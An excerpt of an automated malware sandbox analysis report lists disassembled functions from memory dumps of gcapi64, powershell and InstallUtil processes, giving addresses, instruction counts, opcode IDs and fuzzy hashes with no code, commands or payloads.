                                                                  • Instruction Fuzzy Hash: 0022F230A1DB498FD768EB68C465576B7E0FF8A300F1505BDE4CAC72A2DA75E842CB41
                                                                  Function 00007FFD9BA07AF8 Relevance: .5, Instructions: 497COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f2e3c8226a18c30a3d9e15f80bd5f0e6b5507d28491059132e3f2b1660c6647c
                                                                  • Instruction ID: 4d430901ba90738691c83e1b211140ac0618026895883b7e3a14db4a3b24f8ad
                                                                  • Opcode Fuzzy Hash: f2e3c8226a18c30a3d9e15f80bd5f0e6b5507d28491059132e3f2b1660c6647c
                                                                  • Instruction Fuzzy Hash: 4EF1A130B099498FD794EB6C94657A57BE1EF5A310F5844FEE08DCB2A6DE38AC42C701
                                                                  Function 00007FFD9B790E8E Relevance: .2, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e1e836038593f5c84142998be9fe17e2c468d29c9127a53015abe74dc042008
                                                                  • Instruction ID: 24d9fa0ee84e36fefa00134f42e9c5acae21085c9d4fbb460c913c2b724d26d4
                                                                  • Opcode Fuzzy Hash: 9e1e836038593f5c84142998be9fe17e2c468d29c9127a53015abe74dc042008
                                                                  • Instruction Fuzzy Hash: EC51DF9291F7C94FE7679BB808759603FA1DF17650B0A05EBE0D8CB0F3D9092A5AC352
                                                                  Function 00007FFD9BA1C52F Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8F5$8F5$8F5$xF5$xF5
                                                                  • API String ID: 0-3284819459
                                                                  • Opcode ID: 5323abf4556c027dd97e67e2693f9aa84c45cb6296526e17ee36e1b19ce099c4
                                                                  • Instruction ID: bd4eb23cf3f1862b6db9d337e63445d560e4e121f39b03f1bec6f6d2e79fd01c
                                                                  • Opcode Fuzzy Hash: 5323abf4556c027dd97e67e2693f9aa84c45cb6296526e17ee36e1b19ce099c4
                                                                  • Instruction Fuzzy Hash: 3C41A870A0958D4FE745EBA8C4A0AEDBFF1EF4A310F5445AAC449DF2A6CE6C6946C700
                                                                  Function 00007FFD9BA1C642 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8F5$8F5$8F5$xF5
                                                                  • API String ID: 0-2139613395
                                                                  • Opcode ID: 4edd9c52e6986f8085fef89b0bb3f56443bf1142bfa0717c66218bcd30a8b8d3
                                                                  • Instruction ID: b149a7b50bbb299c13a7170edda2c1c15dd204c2d278fdc8958a27005541363f
                                                                  • Opcode Fuzzy Hash: 4edd9c52e6986f8085fef89b0bb3f56443bf1142bfa0717c66218bcd30a8b8d3
                                                                  • Instruction Fuzzy Hash: 48419670A0954D8FEB55EBA8D4A06FDBBB1EF46310F5440AAC449DB2A6CA7C6846C700
                                                                  Function 00007FFD9B6C6204 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5$ F5$ F5$(F5
                                                                  • API String ID: 0-2095486427
                                                                  • Opcode ID: 54f056eea1fe2b7f751abb4b9b11717b666604087c71ad3a502e57eab0f5a8b7
                                                                  • Instruction ID: 81aae9638c8b4e6e77eb6dcb5c3c05bdb0d6260551a954719a79073dd44eca26
                                                                  • Opcode Fuzzy Hash: 54f056eea1fe2b7f751abb4b9b11717b666604087c71ad3a502e57eab0f5a8b7
                                                                  • Instruction Fuzzy Hash: 2721C33164F6C65FD31AA76448761E5BFE0DF03230B5909EFD499CF0A7D92C28869782
                                                                  Function 00007FFD9BA1EDD6 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8F5$8F5$xF5$xF5
                                                                  • API String ID: 0-3255466360
                                                                  • Opcode ID: d439ecdaa2dc3c184e3408f5d59c5373da53a5303f5c4236a56a7786d0f8d050
                                                                  • Instruction ID: dfd134f89f77579ce9edca1b42a54b82bd11ab762f4717a61399cafbf270a681
                                                                  • Opcode Fuzzy Hash: d439ecdaa2dc3c184e3408f5d59c5373da53a5303f5c4236a56a7786d0f8d050
                                                                  • Instruction Fuzzy Hash: FB019E6554D9D81FD79683B888787E77FF19F5B000B9C08DAC08ACB2A2C42E599ADB40

                                                                  Executed Functions

                                                                  Function 00007FFD9B7B6660 Relevance: .4, Instructions: 397COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1875179969.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b7b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 190e424ee3927ea5f3e17f69cd041c69dd26478f49caed1d08145d0b7f9928c0
                                                                  • Instruction ID: 0046ea5057bcd62c623c3b48b6aa795814a5f5aa88d4531b729b95b6d958aeb7
                                                                  • Opcode Fuzzy Hash: 190e424ee3927ea5f3e17f69cd041c69dd26478f49caed1d08145d0b7f9928c0
                                                                  • Instruction Fuzzy Hash: 77C13772B0EB9D4FEBA4A6A848655B9BBD1EF15214F0902BED54DC70F3DA18EC018B41
                                                                  Function 00007FFD9B6E9EF3 Relevance: .3, Instructions: 276COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1874406498.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b6e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d58a4a1536d3406e08ff2006608086bdde187edaf40308a165e65eeb848d68e
                                                                  • Instruction ID: 93d4c3c2660639d803824ae9683e2dccc6f91a3c7a870a0b834f395fb84e8b61
                                                                  • Opcode Fuzzy Hash: 9d58a4a1536d3406e08ff2006608086bdde187edaf40308a165e65eeb848d68e
                                                                  • Instruction Fuzzy Hash: D581EC33A0BA9A1FEB129B6D9CB54D93B60EF1166C70903B3C4A88F0E3ED1475674781
                                                                  Function 00007FFD9B6E9738 Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1874406498.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b6e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af4938fbe2fe4896e7adc2f3d9ed172e431fcd89b57f178afa42dce73f8a976f
                                                                  • Instruction ID: 82668b162cdb51bebcc62e09cd612c3b4f3de6beb3fd6cbc6f29735ab0e8a65c
                                                                  • Opcode Fuzzy Hash: af4938fbe2fe4896e7adc2f3d9ed172e431fcd89b57f178afa42dce73f8a976f
                                                                  • Instruction Fuzzy Hash: E8412631A0DA488FDB589F5C984A6AD7BE0FFA5310F04416FE459D3292CB30B956CBC2
                                                                  Function 00007FFD9B5CE700 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1873645495.00007FFD9B5CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b5cd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd797f8ec1205ba2f67a833a257e725bfc0a311ca8e06e54d989a47be38a674c
                                                                  • Instruction ID: f02c8106d5cd3f05a23333f97fa36fd9711541d1b4ec86122d105c4c324609ae
                                                                  • Opcode Fuzzy Hash: bd797f8ec1205ba2f67a833a257e725bfc0a311ca8e06e54d989a47be38a674c
                                                                  • Instruction Fuzzy Hash: 9941277140EBC44FD7979B389C559623FF1EF56320B1A01DFD088CB1A3D629A846C792
                                                                  Function 00007FFD9B6EA47C Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1874406498.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b6e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb4192fe4acc4831fd40de94a33810a6dfedde68cbd5f1bbac74d9ccb71e0f24
                                                                  • Instruction ID: 5eb66f0cacb6e6bdeb9db22d47d64404c1fb9ebb47375b3c9ed80326e526cf00
                                                                  • Opcode Fuzzy Hash: eb4192fe4acc4831fd40de94a33810a6dfedde68cbd5f1bbac74d9ccb71e0f24
                                                                  • Instruction Fuzzy Hash: 21210A3190C74C8FDB59DFAC984A7E97FF0EBA6320F04416BD049C7166DA74A41ACB92
                                                                  Function 00007FFD9B6E33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1874406498.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b6e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                  • Instruction ID: 22b824bd88e2b6d48dd14a292a13bac9666b236c475e49cbd940d246467ebbe2
                                                                  • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                  • Instruction Fuzzy Hash: F401A73020CB0C4FD748EF0CE051AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B7B414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1875179969.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b7b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62cab7cd1f09a9a61192362c09180a16f0324a4b27b9f77333df077086b6c1f5
                                                                  • Instruction ID: 0671309f8d4e887ac75e16591f16d360bb54971d9716f94d0f234260ae4b4ae1
                                                                  • Opcode Fuzzy Hash: 62cab7cd1f09a9a61192362c09180a16f0324a4b27b9f77333df077086b6c1f5
                                                                  • Instruction Fuzzy Hash: 19F0E232B0E6198FD769EB4CE4558E873E0EF55320B1200BAE06DC71B3CA25EC40CB85
                                                                  Function 00007FFD9B7B4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1875179969.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b7b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15c2286891bb7add6a8dd1f187d2858f1e3366d0c00d5118b79f01fa2504404b
                                                                  • Instruction ID: 8bfa469ba0827c183c76cf028a9b41cb95980deebfd309c744a339db45dee932
                                                                  • Opcode Fuzzy Hash: 15c2286891bb7add6a8dd1f187d2858f1e3366d0c00d5118b79f01fa2504404b
                                                                  • Instruction Fuzzy Hash: FAF0BE32A0E6598FDB68EA4CE0648A873E0EF0532070200BAE05DC70B3CA25AC50CB40
                                                                  Function 00007FFD9B7B41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1875179969.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b7b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: d2fdef9f9d8698a3263587d2135c568bf769876d187644258486c0ea47f6f652
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: 5EE01A31B0C91C9FDA78DA4CE0559A973E1EB98321B1202BBD14EC7571CA22ED518F81

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B6E8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1874406498.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ffd9b6e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: K_^4$K_^7$K_^F$K_^J
                                                                  • API String ID: 0-377281160
                                                                  • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                  • Instruction ID: 5864d6876c9b656f1fec18a6d9a796d8377cae410ee11958dee8b4d29452c290
                                                                  • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                  • Instruction Fuzzy Hash: B221F6B77085265ED7057B7DB8549DA3BA0DF9827438542F3D1A9CF093EE1470868AD0

                                                                  Executed Functions

                                                                  Function 00007FFD9B844145 Relevance: .7, Instructions: 688COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a6db90f2f80b7924f9f8ab5adcb0137450b9b36c4ceb53cf91f3658d2fe65b78
                                                                  • Instruction ID: b68f1b1b5c287c6dbbeaee05bdca9b43b67d493e48df167b91727358c5ffe920
                                                                  • Opcode Fuzzy Hash: a6db90f2f80b7924f9f8ab5adcb0137450b9b36c4ceb53cf91f3658d2fe65b78
                                                                  • Instruction Fuzzy Hash: 2802AF11B1F7CA0FE7A697A848752746B92AF5A600F0A41FFD089CB1F3DD1D6A068312
                                                                  Function 00007FFD9B843121 Relevance: .6, Instructions: 563COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 852f0cfc1f9cf6a891b78d3bd58b88edb32c1ce0e17e48a4ce0ad22c2ecc3ebb
                                                                  • Instruction ID: 91ec040d9829f57663c56388c66ff8dc3bf88a5af3bb4d13dbc45c4504629cbc
                                                                  • Opcode Fuzzy Hash: 852f0cfc1f9cf6a891b78d3bd58b88edb32c1ce0e17e48a4ce0ad22c2ecc3ebb
                                                                  • Instruction Fuzzy Hash: FEF1A411B1EB9E0FE7A6A3A804752797AD29F5E700F4B01BAD049CB1F3DD1C5E068352
                                                                  Function 00007FFD9B843681 Relevance: .5, Instructions: 477COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e0a2d831c0deee3c987164c9270fb919d0143051d8a29635384fdc0ed36d78f
                                                                  • Instruction ID: fc6f1ee19c9f8186bf37815115e378acc188b9991634ab36b03286da3b9c44be
                                                                  • Opcode Fuzzy Hash: 1e0a2d831c0deee3c987164c9270fb919d0143051d8a29635384fdc0ed36d78f
                                                                  • Instruction Fuzzy Hash: 33D1C221B1FE4F1BE7B6A7A804B127966D3EF9D250B5A01BAD04DC72F3DD1DA9068301
                                                                  Function 00007FFD9B8442B8 Relevance: .5, Instructions: 467COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59df9953f57a3171de857a7d40c5f8a43ad883082575006a6a35bd38da4d92a7
                                                                  • Instruction ID: 5a2da875441b2bb6de6f0a7dbb210cf18cc20164cce5f52a231f3583f1314c66
                                                                  • Opcode Fuzzy Hash: 59df9953f57a3171de857a7d40c5f8a43ad883082575006a6a35bd38da4d92a7
                                                                  • Instruction Fuzzy Hash: EED1B411B1FB9E0FE7A667A844752786AD2EF9E600F4B41BED049CB1F3DD1CA9064312
                                                                  Function 00007FFD9B8EA53D Relevance: .4, Instructions: 410COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7ca987b854dc3515b95ebd6415be9fed2d518b0468bc01842e2359e617f80d5
                                                                  • Instruction ID: 7be50a10cf93aa7b3ba1172f67a59065ef480074fafdbe019a31af3a552d2fa8
                                                                  • Opcode Fuzzy Hash: c7ca987b854dc3515b95ebd6415be9fed2d518b0468bc01842e2359e617f80d5
                                                                  • Instruction Fuzzy Hash: 9FC11831B0EA8E1FD769AB7884651B57BE1EF5A300B0501BAD44BC71E3DE28A9428781
                                                                  Function 00007FFD9B8E9EAD Relevance: .4, Instructions: 408COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d0e542e3f2f3d53c6a664ae9c5d35cab504d4353970e25da48d1cc5f9da4361
                                                                  • Instruction ID: 72e9ae282cd8c5cc75c9901dcaefce62b9ad4a3ebf0f7f160435b9dad5e97b50
                                                                  • Opcode Fuzzy Hash: 5d0e542e3f2f3d53c6a664ae9c5d35cab504d4353970e25da48d1cc5f9da4361
                                                                  • Instruction Fuzzy Hash: B5B14D22B0EE5E0FE7ADA77C84651B977D2EF8C210B0501BAD44DC72E7DD29AD428381
                                                                  Function 00007FFD9B8443D0 Relevance: .4, Instructions: 381COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3618abbbce818389231436bb4b2dc62738ac0e41a193932af160c71a397f9f9a
                                                                  • Instruction ID: 0742cbf55ca4778727300ef7d331dc6f7bb05ee3aabc2ea4cfa63e5736076bb5
                                                                  • Opcode Fuzzy Hash: 3618abbbce818389231436bb4b2dc62738ac0e41a193932af160c71a397f9f9a
                                                                  • Instruction Fuzzy Hash: 48B16111B1FA9F0BE7A6A7A8447537966C2EF9D600F4B40BED44ACB1E3DD5CAA064301
                                                                  Function 00007FFD9B77090A Relevance: .4, Instructions: 377COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58b716d7451698245cbd283ec446d930181b7d32f305d9e384a93ed601c2646b
                                                                  • Instruction ID: 4477e616041329b43ea5fc8dba6c9fb57e0e873e80d557c48d8781adbd8f5308
                                                                  • Opcode Fuzzy Hash: 58b716d7451698245cbd283ec446d930181b7d32f305d9e384a93ed601c2646b
                                                                  • Instruction Fuzzy Hash: EDD1B37490928E8FEF55CBA8D4A4ABDBFF1FF45310F0522AAD046DB1A2CE795905CB01
                                                                  Function 00007FFD9B770DDE Relevance: .3, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52584b0abb4f7eec7273e97d2de0726c9ed7b2667c588b1d31d84bd9e5fee8a5
                                                                  • Instruction ID: c8fbc8ae98c83043bb3a319922c0e0975dea60056f266164f99ee9af75dc138c
                                                                  • Opcode Fuzzy Hash: 52584b0abb4f7eec7273e97d2de0726c9ed7b2667c588b1d31d84bd9e5fee8a5
                                                                  • Instruction Fuzzy Hash: 3C81FA31B19A0A4FEB98EF7C84A6A7973D2FF94314F5102B9D05EC32F6DE6899018741
                                                                  Function 00007FFD9B7710C6 Relevance: .2, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f756a14573a02483fa2b6c30be22bf6faa06a850f0492df80137c907795fb92
                                                                  • Instruction ID: 1b251e734934be798db5ba709e87238431d95f45154d302df5a34cb4df71aa7e
                                                                  • Opcode Fuzzy Hash: 8f756a14573a02483fa2b6c30be22bf6faa06a850f0492df80137c907795fb92
                                                                  • Instruction Fuzzy Hash: 6291E271E1A7198FDB68CB68D8A1668B7E1FF55314F0142BED04ADB6B2DE746604CB00
                                                                  Function 00007FFD9B770E2C Relevance: .2, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 770ff662634de3a566e168f62d8f9c4b1904917aeafe4dc73670b051c724ea18
                                                                  • Instruction ID: 0143a84b659ca9608d98357b88591fe3ea7603187704737f11c07f00e3290016
                                                                  • Opcode Fuzzy Hash: 770ff662634de3a566e168f62d8f9c4b1904917aeafe4dc73670b051c724ea18
                                                                  • Instruction Fuzzy Hash: 4261F821B19A0E0FEB98EF7884A5B7A72D1FF94314F514279D05EC32E6DEA899028740
                                                                  Function 00007FFD9B7710F3 Relevance: .2, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 33477033bef730bad9f15623b6f0be3f4f95ef9e3f7e56317e422c43f3a3f107
                                                                  • Instruction ID: 0ae77ebdf4ee70e19c3fc4a4105d8382c8e4af5ecd55c9a1db835e6662f3c938
                                                                  • Opcode Fuzzy Hash: 33477033bef730bad9f15623b6f0be3f4f95ef9e3f7e56317e422c43f3a3f107
                                                                  • Instruction Fuzzy Hash: 5261D271F1960D8EDBA8DBA8D8A06A8B7F2FF58314F014279D01DD76B2DE74A640CB40
                                                                  Function 00007FFD9B8E06D3 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <,_^$=,_^
                                                                  • API String ID: 0-3580595196
                                                                  • Opcode ID: 28cf6986de487d3de80b1b7bdba27ab0b57ad68e81621e7d33f0e1d4f46b59e3
                                                                  • Instruction ID: 5f10bb2c019207fae1cb5eca224834da0acbb197bed48ffc10387ffe38ac999d
                                                                  • Opcode Fuzzy Hash: 28cf6986de487d3de80b1b7bdba27ab0b57ad68e81621e7d33f0e1d4f46b59e3
